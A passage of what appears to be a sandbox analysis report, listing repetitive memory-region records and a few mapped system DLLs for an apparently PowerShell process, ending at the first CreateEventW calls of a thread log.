0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1607 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1608 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1609 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1610 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1611 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1612 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1613 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1614 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1615 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1616 start_va = 0x25b74340000 end_va = 0x25b7434ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74340000" filename = "" Region: id = 1617 start_va = 0x25b74350000 end_va = 0x25b7435ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74350000" filename = "" Region: id = 1618 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1619 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1620 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1621 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1622 start_va = 0x25b74340000 end_va = 0x25b7434ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74340000" filename = "" Region: id = 1623 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1624 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1625 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1626 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1627 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1628 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1629 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1630 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1631 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1632 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1633 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1634 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1635 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1636 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1637 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1638 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1639 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1640 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1641 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1642 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1643 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1644 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1645 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1646 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1647 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1648 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1649 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1650 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1651 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1652 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1653 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1654 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1655 start_va = 0x25b74340000 end_va = 0x25b7434ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74340000" filename = "" Region: id = 1656 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1657 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1658 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1659 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1660 start_va = 0x25b74340000 end_va = 0x25b7434ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74340000" filename = "" Region: id = 1661 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1662 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1663 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1664 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1665 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1666 start_va = 0x25b74340000 end_va = 0x25b7434ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74340000" filename = "" Region: id = 1667 start_va = 0x25b74350000 end_va = 0x25b7435ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74350000" filename = "" Region: id = 1668 start_va = 0x25b74360000 end_va = 0x25b7436ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74360000" filename = "" Region: id = 1669 start_va = 0x25b74370000 end_va = 0x25b7437ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74370000" filename = "" Region: id = 1670 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1671 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1672 start_va = 0x653f410000 end_va = 0x653f44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000653f410000" filename = "" Region: id = 1673 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1674 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1675 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1676 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1677 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1678 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1679 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1680 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1681 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1682 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1683 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1684 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1685 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1686 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1687 start_va = 0x25b74340000 end_va = 0x25b7434ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74340000" filename = "" Region: id = 1688 start_va = 0x25b74350000 end_va = 0x25b7435ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74350000" filename = "" Region: id = 1689 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1690 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1691 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1692 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1693 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1694 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1695 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1696 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1697 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1698 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1699 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1700 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1701 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1702 start_va = 0x653f450000 end_va = 0x653f48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000653f450000" filename = "" Region: id = 1703 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1704 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1705 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1706 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1707 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1708 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1709 start_va = 0x25b74340000 end_va = 0x25b7434ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74340000" filename = "" Region: id = 1710 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1711 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1712 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1713 start_va = 0x25b74340000 end_va = 0x25b7434ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74340000" filename = "" Region: id = 1714 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1715 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1716 start_va = 0x25b74340000 end_va = 0x25b7434ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74340000" filename = "" Region: id = 1717 start_va = 0x25b74350000 end_va = 0x25b7435ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74350000" filename = "" Region: id = 1718 start_va = 0x25b74360000 end_va = 0x25b7436ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74360000" filename = "" Region: id = 1719 start_va = 0x25b74370000 end_va = 0x25b7437ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74370000" filename = "" Region: id = 1720 start_va = 0x25b74380000 end_va = 0x25b7438ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74380000" filename = "" Region: id = 1721 start_va = 0x25b74390000 end_va = 0x25b7439ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74390000" filename = "" Region: id = 1722 start_va = 0x25b743a0000 end_va = 0x25b743affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b743a0000" filename = "" Region: id = 1723 start_va = 0x25b743b0000 end_va = 0x25b743bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b743b0000" filename = "" Region: id = 1724 start_va = 0x25b743c0000 end_va = 0x25b743cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b743c0000" filename = "" Region: id = 1725 start_va = 0x25b743d0000 end_va = 0x25b743dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b743d0000" filename = "" Region: id = 1726 start_va = 0x25b743e0000 end_va = 0x25b743effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b743e0000" filename = "" Region: id = 1727 start_va = 0x25b743f0000 end_va = 0x25b743fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b743f0000" filename = "" Region: id = 1728 start_va = 0x25b74400000 end_va = 0x25b7440ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74400000" filename = "" Region: id = 1729 start_va = 0x25b74410000 end_va = 0x25b7441ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74410000" filename = "" Region: id = 1730 start_va = 0x25b74420000 end_va = 0x25b7442ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74420000" filename = "" Region: id = 1731 start_va = 0x25b74430000 end_va = 0x25b7443ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74430000" filename = "" Region: id = 1732 start_va = 0x25b74440000 end_va = 0x25b7444ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74440000" filename = "" Region: id = 1733 start_va = 0x25b74450000 end_va = 0x25b7445ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74450000" filename = "" Region: id = 1734 start_va = 0x25b74460000 end_va = 0x25b7446ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74460000" filename = "" Region: id = 1735 start_va = 0x25b74470000 end_va = 0x25b7447ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74470000" filename = "" Region: id = 1736 start_va = 0x25b74480000 end_va = 0x25b7448ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74480000" filename = "" Region: id = 1737 start_va = 0x25b74490000 end_va = 0x25b7449ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74490000" filename = "" Region: id = 1738 start_va = 0x25b744a0000 end_va = 0x25b744bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b744a0000" filename = "" Region: id = 1739 start_va = 0x25b744c0000 end_va = 0x25b744dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b744c0000" filename = "" Region: id = 1740 start_va = 0x25b744e0000 end_va = 0x25b744effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b744e0000" filename = "" Region: id = 1741 start_va = 0x25b744f0000 end_va = 0x25b744fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b744f0000" filename = "" Region: id = 1742 start_va = 0x25b74500000 end_va = 0x25b7450ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74500000" filename = "" Region: id = 1743 start_va = 0x25b74510000 end_va = 0x25b7451ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74510000" filename = "" Region: id = 1744 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1745 start_va = 0x653f490000 end_va = 0x653f4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000653f490000" filename = "" Region: id = 1746 start_va = 0x653f4d0000 end_va = 0x653f54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000653f4d0000" filename = "" Region: id = 1747 start_va = 0x653f550000 end_va = 0x653f5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000653f550000" filename = "" Region: id = 1748 start_va = 0x7fff73650000 end_va = 0x7fff7365ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff73650000" filename = "" Region: id = 1749 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b410000" filename = "" Region: id = 1750 start_va = 0x7fff73660000 end_va = 0x7fff7366ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff73660000" filename = "" Region: id = 1751 start_va = 0x7fffd7e30000 end_va = 0x7fffd7ed0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.management.infrastructure.native.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.M870d558a#\\57699f619029bcb69fb46cff9280f4cc\\Microsoft.Management.Infrastructure.Native.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.m870d558a#\\57699f619029bcb69fb46cff9280f4cc\\microsoft.management.infrastructure.native.ni.dll") Region: id = 1752 start_va = 0x7fff73670000 end_va = 0x7fff7367ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff73670000" filename = "" Region: id = 1753 start_va = 0x25b74370000 end_va = 0x25b7439bfff monitored = 0 entry_point = 0x25b743967ce region_type = mapped_file name = "microsoft.powershell.psreadline.dll" filename = "\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\Microsoft.PowerShell.PSReadline.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\microsoft.powershell.psreadline.dll") Region: id = 1754 start_va = 0x7fffe0960000 end_va = 0x7fffe0b17fff monitored = 0 entry_point = 0x7fffe09ce630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 1755 start_va = 0x653f5d0000 end_va = 0x653f64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000653f5d0000" filename = "" Region: id = 1756 start_va = 0x7fffe6fe0000 end_va = 0x7fffe7361fff monitored = 0 entry_point = 0x7fffe7031220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 1757 start_va = 0x25b73a10000 end_va = 0x25b73a10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000025b73a10000" filename = "" Region: id = 1758 start_va = 0x7fff73680000 end_va = 0x7fff7368ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff73680000" filename = "" Region: id = 1759 start_va = 0x7fff73690000 end_va = 0x7fff736cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff73690000" filename = "" Region: id = 1760 start_va = 0x25b74340000 end_va = 0x25b7434ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74340000" filename = "" Region: id = 1761 start_va = 0x25b74340000 end_va = 0x25b7434ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74340000" filename = "" Region: id = 1762 start_va = 0x25b74340000 end_va = 0x25b7434ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74340000" filename = "" Region: id = 1763 start_va = 0x25b74340000 end_va = 0x25b7434ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74340000" filename = "" Region: id = 1764 start_va = 0x7fff73690000 end_va = 0x7fff7369ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff73690000" filename = "" Region: id = 1765 start_va = 0x25b74340000 end_va = 0x25b7434ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74340000" filename = "" Region: id = 1766 start_va = 0x25b74340000 end_va = 0x25b7434ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74340000" filename = "" Region: id = 1767 start_va = 0x25b74340000 end_va = 0x25b7434ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74340000" filename = "" Region: id = 1768 start_va = 0x25b74340000 end_va = 0x25b7434ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74340000" filename = "" Region: id = 1769 start_va = 0x25b74340000 end_va = 0x25b7434ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74340000" filename = "" Region: id = 1770 start_va = 0x25b74340000 end_va = 0x25b7434ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74340000" filename = "" Region: id = 1771 start_va = 0x25b74340000 end_va = 0x25b7434ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74340000" filename = "" Region: id = 1772 start_va = 0x25b74340000 end_va = 0x25b7434ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74340000" filename = "" Region: id = 1773 start_va = 0x25b74340000 end_va = 0x25b7434ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74340000" filename = "" Region: id = 1774 start_va = 0x25b74340000 end_va = 0x25b7434ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74340000" filename = "" Region: id = 1775 start_va = 0x25b74340000 end_va = 0x25b7434ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74340000" filename = "" Region: id = 1776 start_va = 0x25b74340000 end_va = 0x25b7434ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74340000" filename = "" Region: id = 1777 start_va = 0x25b74340000 end_va = 0x25b7434ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74340000" filename = "" Region: id = 1778 start_va = 0x25b74350000 end_va = 0x25b7435ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74350000" filename = "" Region: id = 1779 start_va = 0x25b74360000 end_va = 0x25b7436ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74360000" filename = "" Region: id = 1780 start_va = 0x25b74340000 end_va = 0x25b7434ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74340000" filename = "" Region: id = 1781 start_va = 0x25b74350000 end_va = 0x25b7435ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74350000" filename = "" Region: id = 1782 start_va = 0x25b74360000 end_va = 0x25b7436ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74360000" filename = "" Region: id = 1783 start_va = 0x653f650000 end_va = 0x653f68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000653f650000" filename = "" Region: id = 1784 start_va = 0x25b74340000 end_va = 0x25b7434ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74340000" filename = "" Region: id = 1785 start_va = 0x25b74340000 end_va = 0x25b74342fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000025b74340000" filename = "" Region: id = 1786 start_va = 0x7fffecc80000 end_va = 0x7fffecd18fff monitored = 0 entry_point = 0x7fffeccaf4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Thread: id = 20 os_tid = 0x1160 [0287.543] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa18 [0287.544] CreateEventW 